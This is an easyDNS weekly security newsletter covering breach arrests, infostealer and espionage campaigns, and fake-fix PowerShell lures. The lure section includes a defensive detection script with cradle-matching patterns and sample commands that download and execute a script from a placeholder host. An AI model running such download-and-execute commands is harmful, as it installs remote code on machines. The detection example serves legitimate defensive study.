Weekly Axis Of Easy #355
Last Week’s Quote was: “The price good men pay for indifference to public affairs is to be ruled by evil men.” by Plato. Harry had the right answer first.
This Week’s Quote: “Stop being moons. Stop living by reflected light. Get into action and convert yourself to a living sun.” by ???
THE RULES: No searching up the answer; it must be posted at the bottom of the blog post, in the comments section.
The Prize: First person to post the correct answer gets their next domain or hosting renewal on us.
This is your easyDNS #AxisOfEasy Briefing for the week of June 17th, 2024. Our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.
To listen to or watch this podcast edition, with commentary and insight from Joey Tweets and Len the Legend, click here.
In this issue:
- Massive Data Breach at Desjardins Group Leads to Arrests
- Malicious Campaign Targets Cryptocurrency Users via Deceptive Virtual Meeting Software
- Mouse Jigglers and the Productivity Charade: Wells Fargo Fires Expose Flaws in Hybrid Work Monitoring
- Deceptive Cyberattacks: The Rising Threat of Malware Through Fake Fixes
- Unveiling Velvet Ant: A Stealthy Cyber Espionage Saga
Elsewhere Online
- Cyber Intrusions Reported at Tech Giants AMD and Apple
- Critical 911 Services Interrupted in Massachusetts by Firewall Mishap
- Adobe Commits to Ethical AI Training Practices, Artists Remain Wary
- Security Breach Alert as ONNX Targets Microsoft 365 MFA Protections
- TellYouThePass Ransomware Seizes Opportunity with Patched PHP Flaw
Massive Data Breach at Desjardins Group Leads to Arrests
Laval police recently apprehended three suspects in connection with a significant data breach at Desjardins Group, a Quebec-based credit union. The breach, which came to light in 2019, is considered one of the largest ever among Canadian financial institutions, impacting millions of customers.
Imad Jbara (33) and Ayoub Kourdal (36) face charges related to fraud, trafficking in identity information, and identity theft. A fourth suspect remains at large. The leaked data included sensitive details such as names, addresses, birth dates, social insurance numbers (SINs), and email addresses. Armed with this information, scammers gained temporary access to Desjardins’ login portal (AccèsD) and executed fraudulent transactions, resulting in an $8.9 million loss.
Desjardins was found negligent by the Superior Court of Quebec, leading to a more than $200-million settlement in a class-action lawsuit. Reports from the Office of the Privacy Commissioner of Canada and the Commission d’accès à l’information du Québec highlighted the institution’s failure to safeguard members’ personal and financial data. The breach originated from an employee within the marketing team who had unauthorized access to confidential information stored in shared directories.
As fraud reports continue to rise, authorities emphasize vigilance: never share personal or bank information without confirming the recipient’s identity. Desjardins has cooperated with law enforcement, but the incident serves as a stark reminder of the need for robust data protection measures.
Malicious Campaign Targets Cryptocurrency Users via Deceptive Virtual Meeting Software
Insikt Group, a cybersecurity provider, has uncovered a widespread malicious campaign targeting cryptocurrency users. The campaign revolves around Vortax, a deceptive virtual meeting software falsely marketed as an AI-powered alternative to popular video chat services.
Once installed, Vortax delivers three information stealers (infostealers) in cross-platform attacks. Of particular interest is the rare macOS infostealer called AMOS, which stands out due to its scarcity compared to its Windows counterparts. Researchers have identified connections between the Vortax campaign and a previous infostealer campaign targeting web3 gaming projects.
This escalating threat underscores the need for vigilance among cryptocurrency users. As use of the AMOS infostealer grows, macOS users may find themselves increasingly exposed.
Mouse Jigglers and the Productivity Charade: Wells Fargo Fires Expose Flaws in Hybrid Work Monitoring
Hybrid work, where employees split time between office and home, has sparked a game of cat and mouse between employers and staff. Employers are deploying productivity monitoring software, presumably to address concerns about remote work dips. Employees are fighting back with mouse jigglers, cheap gadgets that fake cursor movement.
These jigglers, trending on TikTok and surging in searches by 2022, are a symptom of a broken system. Wells Fargo has responded to this trend by dismissing several employees within its wealth and investment management division, as reported by Bloomberg. These individuals were found to be using mouse jigglers to simulate keyboard activity, according to disclosures made to FINRA. The circumstances surrounding their detection and whether the misconduct occurred during remote or office hours remain unclear.
This situation underscores the challenges faced by employers in managing a workforce that is no longer centralized. While banks such as JPMorgan Chase and Goldman Sachs have been pushing for a return to pre-pandemic office routines, the emergence of mouse jigglers highlights the unintended consequences of remote work and raises questions about the effectiveness of stringent monitoring practices.
Deceptive Cyberattacks: The Rising Threat of Malware Through Fake Fixes
In a recent surge of cyberattacks, threat actors are using JavaScript to display counterfeit error messages that impersonate popular applications like Google Chrome, Microsoft Word, and OneDrive. These fraudulent prompts coax users into copying and running a PowerShell script that masquerades as a fix but ultimately leads to malware deployment. A report from Proofpoint cautions about these attacks, noting their reliance on significant user interaction and the persuasive nature of the fake problems and solutions presented.
The attacks unfold through various schemes. One involves malicious scripts on compromised websites that trick users into executing a PowerShell script under the guise of installing a root certificate, which then downloads further malicious payloads. Another tactic overlays phony Chrome error messages on websites, prompting similar malware downloads. An email-based attack chain employs HTML attachments that imitate Word documents, directing users to install bogus extensions or run PowerShell commands that trigger malware infections.
These attack chains exploit the general lack of user awareness about the risks of executing PowerShell commands, and the inability of Windows systems to intercept and prevent the malicious activity that such user-run code triggers. The threat group TA571 is particularly active in experimenting with these methods, seeking to refine its approach and ensnare a broader array of victims.
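Because the victim runs the "fix" themselves, the defender's best signal is the shape of the resulting PowerShell process: an interactive launch (the Run dialog is a child of explorer.exe) combined with a hidden window, an execution-policy bypass, an encoded command and a download cradle. The following triage script is an added example written for this newsletter, not code from Proofpoint or from the campaign it describes; it assumes Sysmon-style process-creation fields (parent_image, image, command_line) and scores constructed sample records, including the hostname fix.example.invalid, that are not real telemetry.

```python
import base64
import binascii
import re
from typing import Dict, List

# Weighted command-line indicators typical of "paste this fix into Run" lures
# (assumed weights, tuned for this example rather than taken from any vendor rule).
INDICATORS = {
    "hidden_window": (re.compile(r"-w\w*\s+h(?:idden)?\b", re.I), 2),              # -w hidden / -WindowStyle Hidden
    "policy_bypass": (re.compile(r"-e(?:p|x\w*)\s+(?:bypass|unrestricted)\b", re.I), 2),  # -ep bypass / -ExecutionPolicy Bypass
    "download_cradle": (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                   r"downloadstring|downloadfile|start-bitstransfer|curl|wget)\b", re.I), 3),
    "inline_eval": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "no_profile": (re.compile(r"-nop\w*\b", re.I), 1),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 token of plausible length.
ENCODED_CMD = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)
REVIEW_THRESHOLD = 5
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog (Win+R) and desktop launches


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(token: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it does not decode cleanly."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return ""


def triage(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation record; 'review' is True when the score reaches the threshold."""
    cmd = event.get("command_line", "")
    hits: List[str] = []
    score = 0
    # Unwrap -EncodedCommand so indicators hidden inside the base64 still count.
    m = ENCODED_CMD.search(cmd)
    decoded = decode_encoded_command(m.group(1)) if m else ""
    if decoded:
        hits.append("encoded_command")
        score += 2
    text = cmd + "\n" + decoded
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
            score += weight
    # PowerShell spawned directly by the user's shell is what a copy/paste lure produces.
    if (_basename(event.get("image", "")) in POWERSHELL_IMAGES
            and _basename(event.get("parent_image", "")) in INTERACTIVE_PARENTS):
        hits.append("launched_from_explorer")
        score += 2
    return {"score": score, "indicators": hits, "review": score >= REVIEW_THRESHOLD, "decoded": decoded}


# Constructed sample records (not real telemetry). The third is a benign management-agent run.
_ENC_PAYLOAD = base64.b64encode(
    "iex (New-Object Net.WebClient).DownloadString('http://fix.example.invalid/update.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {   # lure output: explorer.exe spawns a hidden PowerShell download cradle
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://fix.example.invalid/fix.ps1 -UseBasicParsing)"',
    },
    {   # same lure with the payload folded into -EncodedCommand
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell.exe -nop -w hidden -enc {_ENC_PAYLOAD}",
    },
    {   # benign: an (assumed) management agent running a local inventory script
        "parent_image": r"C:\Program Files\ExampleAgent\agent.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -NoProfile -NonInteractive -File C:\Scripts\inventory.ps1",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = triage(ev)
        print(result["score"], "REVIEW" if result["review"] else "ok", result["indicators"])
```

The two lure records score well above the threshold while the agent-launched script scores 1, so the parent-process check does most of the work of separating user-pasted commands from scheduled administration; decoding the base64 before matching is what keeps the second record from slipping through with only the hidden-window flag visible.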
Unveiling Velvet Ant: A Stealthy Cyber Espionage Saga
Sygnia’s cybersecurity experts have disclosed a prolonged and clandestine cyber-espionage operation by the Velvet Ant group, emanating from China, targeting a significant corporation in East Asia. The group demonstrated remarkable persistence, repeatedly evading detection and removal from the victim’s network by exploiting overlooked legacy systems. The report from Sygnia highlights Velvet Ant’s adaptability, as they consistently found new ways to maintain their presence within the corporate network despite discovery and remediation efforts.
Velvet Ant’s strategy involved deploying the once-popular PlugX remote access Trojans on outdated Windows Server 2003 systems, utilizing the Impacket toolkit for spreading laterally and executing commands on compromised machines. Sygnia’s initial expulsion attempts were met with Velvet Ant’s resurgence through backup malware hidden on legacy systems, indicating a sophisticated fallback strategy. The group also cleverly set up an internal file server to act as a command-and-control center, allowing them to continue their operations without external communication.
The campaign’s intricacy was further highlighted when Sygnia found backdoors on neglected legacy F5 Big-IP load-balancing systems, which were part of an abandoned disaster recovery initiative. These systems facilitated access to the internal command-and-control server. To thwart such advanced threats, Sygnia advises organizations to retire obsolete systems promptly and enforce rigorous monitoring protocols to close gaps that could be exploited by advanced persistent threats and nation-state actors for covert espionage operations.
Elsewhere Online
Cyber Intrusions Reported at Tech Giants AMD and Apple
https://www.infosecurity-magazine.com/news/threat-actor-amd-apple-breaches/
Critical 911 Services Interrupted in Massachusetts by Firewall Mishap
https://www.securityweek.com/massachusetts-911-outage-caused-by-errant-firewall/
Adobe Commits to Ethical AI Training Practices, Artists Remain Wary
Security Breach Alert as ONNX Targets Microsoft 365 MFA Protections
https://www.darkreading.com/remote-workforce/onnx-microsoft-365-accounts-mfa-bypass
TellYouThePass Ransomware Seizes Opportunity with Patched PHP Flaw
If you missed the previous issues, they can be read online here:
- June 10th, 2024: Canada’s Cybercrime Response Critically Deficient, Auditor General Finds
- June 3rd, 2024: Massive Google Leak Exposes Search Algorithm Mysteries and Legal Implication
- May 27th, 2024: Vulnerability in Apple’s Location Services Exposes Privacy Risks
- May 20th, 2024: YouTube Faces Surge In Phishing And Deepfake Scams
- May 13th, 2024: Malware Disguised As Popular Apps Targets Android Users